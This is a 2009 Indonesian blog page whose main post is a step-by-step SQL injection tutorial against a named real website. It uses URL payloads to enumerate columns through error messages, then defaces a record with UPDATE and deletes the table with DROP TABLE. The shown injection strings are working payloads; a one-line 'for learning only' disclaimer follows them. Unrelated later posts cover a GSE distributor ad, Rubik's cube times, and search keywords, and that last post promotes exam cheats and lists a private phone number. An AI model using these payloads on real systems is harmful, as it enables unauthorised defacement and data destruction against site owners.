Friday, October 16, 2009

Belajar Teknik Hacking SQL Injection [Pada URL] - Untuk Pemula

Belajar Teknik Hacking SQL Injection [Pada URL]
Untuk Pemula

Pada kesempatan kali ini, saya akan mencoba menerangkan tentang serangan ke suatu website menggunakan teknik SQL Injection. Saya akan menunjukkan SQL Injection melalui URL. Pada dasarnya caranya adalah sama karena keduanya sama- sama merupakan parameter input.

Teknik untuk menemukan nama field dan table ditemukan oleh david Litcfield. Teknik yang digunakan disini adalah dengan membuat terjadinya error menggunakan perintah having 1=1

STEP 1
Oke, kita langsung masuk ke contoh nyata. Web target kita kali ini ialah :

http://www.24x7learning.com/Press_Releases/news.asp?id=57

Untuk mendapatkan nama table dan nama field pertama, ialah dengan cara memasukkan perintah dibawah ini pada browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :

nama table = media
nama field pertama = id


STEP 2
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediadate' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :

nama field kedua = mediadate



STEP 3
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediatitle' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :

nama field ketiga = mediatitle


STEP 4
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediapublisher' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :

nama field keempat= mediapublisher


STEP 5
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle,media.mediapublisher having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediapath' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :

nama field kelima= mediapath


STEP 6
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle,media.mediapublisher,media.mediapath having 1=1

Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini

Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.ishtml' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6

Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field keenam= ishtml


STEP 7
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :

http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle,media.mediapublisher,media.mediapath,media.ishtml having 1=1

Dengan perintah tersebut, maka kita tidak akan mendapatkan pesan error apapun. Artinya, bahwa pencarian field sudah selesai.


HACKING STEP....


MERUBAH DATA
Untuk merubah data, gunakanlah command SQL yaitu UPDATE. Contohnya kita akan merubah isi dari field ”mediapublisher”, perintah lengkapnya ialah :


http://www.24x7learning.com/Press_Releases/news.asp?id=57; UPDATE media set mediapublisher=’HACKER WAS HERE’ where id=57;


Sekarang Anda coba akses alamat :

http://www.24x7learning.com/Press_Releases/news.asp?id=57

Silahkan, lihat perubahannya.


MENGHAPUS TABLE
Tindakan yang paling “extreme” ialah menghapus/ drop table. Untuk melakukannya Anda bisa menggunakan comman SQL, yaitu DROP. Perintah lengkapnya ialah :


http://www.24x7learning.com/Press_Releases/news.asp?id=57; drop table
media;

End….


Artikel ini hanya untuk tujuan pembelajaran semata. Tidak pernah dibenarkan untuk melakukan kegiatan cracking kepada suatu website. Satu hal yang perlu Anda ketahui ialah dengan melakukan deface terhadap 100 website tidak akan menjadikan Anda seorang Hacker.


Regards,


Psychozetic
Posted by at 5 comments:
Labels: ,

Sunday, October 11, 2009

Penjualan alat GSE - Ground Support Equipment - Indonesia

PT Agriquip-id.com is the distributor for a broad range of quality aircraft ground support equipment (GSE) for military, corporate business jets and commercial airlines.

Office :Jl. Marsekal Suryadharma Pergudangan Bandara Mas,
Blok A2 No. 12A,
Selapajang Jaya - Tangerang - Banten
Indonesia
15127
Alamat Website: https://agriquip-id.com



"Produsen Suplier peralatan dan jasa ground Support equipment , peralatan pendukung bandara, peralatan gse , alat gse , alat gse indonesia , btt , jas , jasa angkasa semesta , gapura angkasa , airfast , gmf aa , airfast , gse , Ground Support Equipment , GPU , ground power unit , ATT , aircraft towing tractor , HLL , high lift loader , Hobart GSE agent Indonesia , Schopf Agent Indonesia , Harlan Agent Indonesia, Trilectron Agent Indonesia , Airmarrel Agent Indonesia ,PT Agriquip GES Indonesia is the distributor for a broad range of quality aircraft ground support equipment (GSE) for military, corporate business jets and commercial airlines.
Posted by at No comments:
Labels: ,

Friday, October 9, 2009

Rubik's Cube - New Record - 3x3x3 - Sub 60

Alhamdulillah..
Akhirnya, setelah usaha sekian lama :D
tembus juga dibawah 60 detik.



Buat temen2. Thanxz atas supportnya.. ;-)

Percobaan ke-1 = 52.57 Second
Percobaan ke-2 = 55.25 Second
Percobaan ke-3 = 1:16.58 Minute
Percobaan ke-4 = 1:18.02 Minute
Percobaan ke-5 = 57.25 Second
------------------------------------
Average = 1:03.03 Minute
Posted by at No comments:
Labels: , ,

Thursday, October 1, 2009

Owh,, Ternyata kamu pake KEYWORD itu toh

Udah pada join ke situs feedjit.com khan ?
Klo belum, Y dah kamu masuk aja melalui gerbang ini. Awalnya saya tidak begitu tahu fungsi dari feddjit ini. Tp, karena tidak mau kalah dengan para blogger lainnya. Jadi, sok- sok an ikut gabung aja.

http://feedjit.com berfungsi sbg Live traffic untuk web blog yg kita miliki. Untuk penjelasan lebih detail, kamu bisa lihat saja di website resminya.

Ternyata seru juga loh, kita bisa lihat para user yg mengunjungi web blog kita melalui Keyword / "kata kunci" yang mereka masukkan di mesin pencari "kebanyakan dari Google sih".

Dibawah ini merupakan contoh2 keyword yg berhasil saya rangkum--yg mana dengan kata kunci tsb--, akhirnya mereka bisa menemukan / mengunjungi web blog saya :

  • cheat UM
  • pengantar sistem komputer cheat
  • rubik cube indonesia
  • lubrikasi rubik
  • Kumpulan Google dork
  • audio driver for compaq presario v3000
  • Belajar rubik dari sang ahli
  • do'a mohon jodoh
  • reseller rubik
  • website-website yang termasuk kelompok search engine.
  • free download driver compaq presario v3500.
  • "Richard Gunawan" surabaya
  • rubiks metode
  • lenovo y450

Sekalian ah, mau komentarin ttg keyword2 diatas. :D

cheat UM
Lagi nyari cheat um / Ujan Mandiri yah, juragan ?! ha..ha...
Tenang aja sob, cheat yg ada di blog ini udah di uji coba semua. Insya Alloh dapet nilai A semuanya. Klo mau periksa seluruh cheat UM yg ada di blog ini. Silahkan masuk lewat jalur ini.


pengantar sistem komputer cheat
Saya g perlu komen lagi y ?! Silahkan, lihat komen diatas!


rubik cube indonesia
Knp sob ?! Mau nyari komunitas rubik's cube ya? Tenang aja.. Lo bisa gabung dengan komunitas speedsolvers.com
Sampai ketemu di forum yah :-)


lubrikasi rubik
Mau bljr teknik/ cara lubrikasi rubiks bro ?!
Yowisss.. g usah bingung2.. Mudah kok. Dan sudah banyak jg kok, di youtube video2nya. Tinggal, search aja. Atau tanya2 di Forum speedsolvers.com
Saya tunggu di forum yah ;-)

Kumpulan Google dork
Anda mengunjungi web blog yg tepat ;-)
Gabung juga ya di Forum Jasakom.Com
nanti ketemu dgn saya, di topic search engine hacking.

audio driver for compaq presario v3000
Monggo, tinggal ikutin aja artikelnya. Insya Alloh, jalan tuh "suara"nya.

Belajar rubik dari sang ahli
Wew... aku bukan "sang ahli" untuk permainan rubik's cube sob ! Tp, sedang berusaha/ belajar untuk menjadi seorang speed cuber. Sampai detik ini pun, waktu terbaik ku dalam solve rubik's cube 3x3x3, masih 1 menit 17 detik.
Btw,, Keyword mu itu bro.. Aneh banget. ha...ha...
Yowiss.. walaupun aku bukan ahlinya "spt yg kamu mksd". But, kamu bisa bljr metode beginner "layer by layer". Silahkan masuk lewat pintu ini bro.
Insya Alloh, dengan ketekunan, dalam waktu belajar 1x24 jam kamu dah bisa solve. ;-)

do'a mohon jodoh
Kita sama2 mohon yah, sob. ;-)

reseller rubiks
Mau / berminat untuk jadi reseller rubik's cube ?
Yowiss.. Monggo baca artikel ku disini. Silahkan hubungi teman ku tsb "mas Robert Gunawan". Ndak usah malu2, tanya2 saja juga boleh. Atau kamu hanya ingin membeli rubik's cube dengan kualitas yg mantab bin ajiib, aseli import dr negeri paman sam ?! Silahkan, kamu bisa hubungi beliau.
Masih malu juga ?!
Yowisslah,, untuk opening pembicaraan. Blg saja kamu dapet info dari web blog "yudha - tangerang". Terus, kamu bermaksud tuk tanya2 perihal reseller rubik's cube / mau membeli rubik's cube ori.
Mudah toh ?!
Contact person :
Robert Gunawan
0856 318 3333

website-website yang termasuk kelompok search engine.
Aku ndak paham, mksdmu ?!

free download driver compaq presario v3500.
Silahkan tinggal ikuti saja panduannya dalam artikel ini.

"Richard Gunawan" surabaya
Duh..duh.. saya bingung nih dengan keyword yg satu ini,
Mksdnya apa ya?!
Aku kenal dengan brother Richard Gunawan yg tinggal di Surabaya. Aku biasa beli rubik's cube kepada dia. Tinggalnya memang di Surabaya. Mau no. telp nya ?! aku ada kok ;-)

rubiks metode
Silahkan, baca komen2 aku diatas.

lenovo y450
Aku tidak menjual laptop tsb. hanya memberikan panduan installasi driver pada laptop type tsb. Monggo,, tinggal d ikuti saja artikelnya.

---------------------------------
Oke,, Terima kasih kepada para pengguna internet yg telah mengunjungi blog ku yg sangat sederhana ini. Bagi yang merasa telah menggunakan keyword2 diatas, lalu punya kepentingan dengan diriQuw ini. Silahkan, hubungi aku di **psychozetic[at]NOSPAMgmail[dot]com

**Hapus kata NOSPAM
Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)